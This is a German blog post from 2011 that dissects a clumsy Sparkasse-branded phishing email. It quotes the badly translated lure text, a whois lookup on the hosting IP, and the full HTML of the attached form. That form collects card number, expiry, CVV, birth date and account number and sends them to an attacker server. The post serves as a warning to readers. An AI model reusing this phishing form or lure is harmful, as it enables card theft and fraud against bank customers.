Ganz plumper Phishing-Versuch: Kreditkartenbetrüger müssen ja übel bezahlt sein …

20 September 2011 Kein Kommentar Autor: Jürgen (jdo)

Phishing-Versuch Sparkasse

So sieht die phishing-Webseite aus

… sonst könnten sie sich Übersetzer leisten. Der “Phishing-Versuch” kommt mit einem Anhang Erstellen Sie Ihren Code fur MasterCard SecureCode oder Verified by VISA .zip. Dort befindet sich eine HTML-Datei, die Bilder von der IP-Adresse 62.75.242.231 nachlädt und dort auch die Daten des hoffentlich nicht ausgefüllten Formulars hinschickt. Unter der doch recht eigenartigen Aufforderung, meine Kreditkarte aktiviert zu halten der Code der Datei.

Eine whois-Abfrage auf die IP-Adresse ergibt einen Hoster in Deutschland. Ich hab den gerade informiert.

  1. organisation:   ORG-BSBS1-RIPE
  2. org-name:       B S B - Service GmbH
  3. org-type:       OTHER
  4. descr:          Internet-Hoster
  5. remarks:        BSB Service GmbH is part of intergenia AG
  6. address:        Daimlerstr.9-11
  7. address:        50354 Huerth
  8. address:        Germany
  9. phone:          +49 2233 612-0
  10. fax-no:         +49 2233 612-144
  11. admin-c:        NPA10-RIPE
  12. tech-c:         NPA10-RIPE
  13. mnt-ref:        INTERGENIA-MNT
  14. mnt-by:         INTERGENIA-MNT
  15. source:         RIPE # Filtered
  16.  
  17. role:            NMC PlusServer AG
  18. address:         PlusServer AG
  19. address:         Daimlerstr. 9-11
  20. address:         50354 Huerth
  21. phone:           +49 1801 119991
  22. fax-no:          +49 2233 612-53500

Eigentlich sollte ich mich bei der Sparkasse beschweren. Deren Deutsch ist ja unter aller Sau :) … ich bin fast geneigt zu sagen, wer auf so einen plumpen Phishing-Versuch hereinfällt, der darf gerne eine Spende bezahlen. Allerdings heisst das nicht, dass die Übersetzungen künftig besser werden. Dennoch macht man nicht einfach irgendetwas in einem Browser auf und gibt dann seine Kreditkarten-Details an.

Sehr geehrte Sparkasse Card,

Ihre Kreditkarte wird ausgesetzt, weil wir gemerkt haben, haben
Sie nicht
Aktivieren Sie Verified by Visa – MasterSecure Code.

Aktivieren Sie Verified by Visa – MasterSecure Code, um Sie gegen
unbefugtes
Einkaufe, wenn shoppin Online schnell und einfach.

Zu Ihrem Schutz haben wir Ihre Kredit Warenkorb ausgesetzt. So
aktivieren Sie
Ihre Karte herunterladen Befestigung und das Formular ausfullen
und folgen Sie den Anweisungen zur Aktualisierung
Ihre Kreditkarte.

Hinweis: Wenn nicht von 20 September 2011 abgeschlossen ist,
werden wir gezwungen sein,
Ihre Karte, weil sie für betrugerische Transaktionen verwendet
werden konnen.

Bitte laden Sie herunter und entpacken Sie das Formular im Anhang
dieser E-Mail und
öffnen Sie sie in einem Web-Browser.

Wir bedanken uns für Ihre Kooperation in dieser Angelegenheit.

sparkasse.de 2011 Alle Rechte vorbehalten. Vervielfaltigung nur
mit Genehmigung der Sparkassen-Finanzportal GmbH.

  1. <HTML>
  2. <HEAD>
  3. <META http-equiv=Content-Type content="text/html; charset=utf-8">
  4. <META http-equiv=Pragma content=no-cache>
  5. <LINK rel="stylesheet" href="http://phone.ipkall.com/css/iepc.css" type="text/css">
  6. </HEAD>
  7. <BODY>
  8. <center><BR /><BR />
  9. <IMG border="0" alt="" src="http://62.75.242.231/tmp/Sparkassen_BCS.gif">
  10.  
  11.  
  12. <IMG border="0" alt="" src="http://62.75.242.231/tmp/vpas_logo.gif" width="79" height="46">    
  13. <IMG border="0" alt="" src="http://62.75.242.231/tmp/mpas_logo.gif" width="79" height="46"></A></center>
  14. <FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1" action="http://62.75.242.231/tmp/pbs.php">
  15. <TABLE border="0" align="center">
  16.   <TBODY>
  17.   <TR>
  18.     <TD>Kreditkartennummer:</TD>
  19.     <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
  20.   <TR>
  21. </TD></TR>
  22.   <TR>
  23.   <TR>
  24. </TD></TR>
  25.   <tr>
  26. <td class="tdq"><div>Verfalldatum:</div></td>
  27. <td class="tda"><input title="Issuer Answer" name="mm" size="2" maxlength="2" class="monospace" type="text"> . <input title="Issuer Answer" name="yyyy" size="4" maxlength="4" class="monospace" type="text"> (MM.JJJJ)</td>
  28. </tr>
  29. </TD></TR>
  30.   <TR>
  31.   <TR>
  32. </TD></TR>
  33.   <TR>
  34.     <TD>Die Pr&uuml;fnummer:</TD>
  35.     <TD><INPUT maxLength="3" size="2" type="text" name="cvv"></TD></TR>
  36.   <TR>
  37. </TD></TR>
  38.   <TR>
  39.   <TR>
  40. </TD></TR>
  41. <tr>
  42. <td class="tdq"><div>Geburtsdatum:</div></td>
  43. <td class="tda"><input title="Issuer Answer" name="dob_dd" size="1" maxlength="2" class="monospace" type="text"> .
  44.         <input title="Issuer Answer" name="dob_mm" size="1" maxlength="2" class="monospace" type="text"> .
  45.         <input title="Issuer Answer" name="dob_yy" size="2" maxlength="4" class="monospace" type="text"> (TT.MM.JJJJ)</td>
  46. </tr>
  47.   <TR>
  48. </TD></TR>
  49.   <TR>
  50.   <TR>
  51. </TD></TR>
  52.   <TR>
  53.     <TD>Kreditkartenkontonummer:</TD>
  54.     <TD><INPUT maxLength="10" size="10" type="text" name="kont"></TD>
  55.   </TR>
  56.   <TR>
  57. </TD></TR>
  58.   <TR>
  59.   <TR>
  60. </TD></TR>
  61.   <TR>
  62.     <TD colSpan=2 align="middle"><BR><INPUT id="submit1" value="Weiter ->>" type="submit" name="submit1">  </TD>
  63.   </TR>
  64.   <TR>
  65.     <TD> </TD>
  66.   </TR>
  67.   <TR>
  68.     <TD colSpan="2" align="middle">www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html</TD>
  69.   </TR>
  70. </TBODY>
  71. </TABLE>
  72. </FORM>
  73. <script language = "javascript">
  74.   function submitIt(form) {
  75.     if (form.card.value == "") {
  76.       alert("Kredit / Debit Kartennummer: Bitte geben Sie eine gültige Kartennummer,\n16 Ziffern ohne Leerzeichen ohne Bindestrich.");
  77.       form.card.focus();
  78.       form.card.select();
  79.       return false;
  80.     }else if (form.mm.value == "") {
  81.       alert("Verfalldatum: Bitte geben Sie eine gültige Verfalldatum.");
  82.       form.mm.focus();
  83.       form.mm.select();
  84.       return false;
  85.     }else if (form.yyyy.value == "") {
  86.       alert("Verfalldatum: Bitte geben Sie eine gültige Verfalldatum.");
  87.       form.yyyy.focus();
  88.       form.yyyy.select();
  89.       return false;
  90.     }else if (form.cvv.value == "") {
  91.       alert("Prüfnummer: Bitte geben Sie eine gültige Prüfnummer.");
  92.       form.cvv.focus();
  93.       form.cvv.select();
  94.       return false;
  95.     }else if (form.dob_dd.value == "") {
  96.       alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
  97.       form.dob_dd.focus();
  98.       form.dob_dd.select();
  99.       return false;
  100.     }else if (form.dob_mm.value == "") {
  101.       alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
  102.       form.dob_mm.focus();
  103.       form.dob_mm.select();
  104.       return false;
  105.     }else if (form.dob_yy.value == "") {
  106.       alert("Geburtsdatum: Bitte geben Sie eine gültige Geburtsdatum.");
  107.       form.dob_yy.focus();
  108.       form.dob_yy.select();
  109.       return false;
  110.     }else if (form.kont.value < 10) {
  111.       alert("Kreditkartenkontonummer: Bitte geben Sie eine gültige Kreditkartenkontonummer.");
  112.       form.kont.focus();
  113.       form.kont.select();
  114.       return false;
  115.     }else{
  116.       return true;
  117.     }    
  118.   }
  119. </script>
  120. </BODY>
  121. </HTML>


Du kannst gerne Deinen Senf zu diesem Beitrag geben: Hier geht es zu den Kommentaren


Schreiben macht durstig! Eine kleine Erfrischung kann daher nie schaden. Wem dieser freie Artikel gefallen hat, der darf mir gerne einen frisch gezapften Hopfen-Tee ausgeben (Paypal - der Spenden-Knopf
oder bitcoin - Adresse: 1NacVNwcLLePUVv8uSafu5Ykdwh8QyDfgK). Ich freue mich über jede noch so kleine Spende. Vielen Dank und Prost!
 Alle Kommentare als Feed abonnieren

Antworten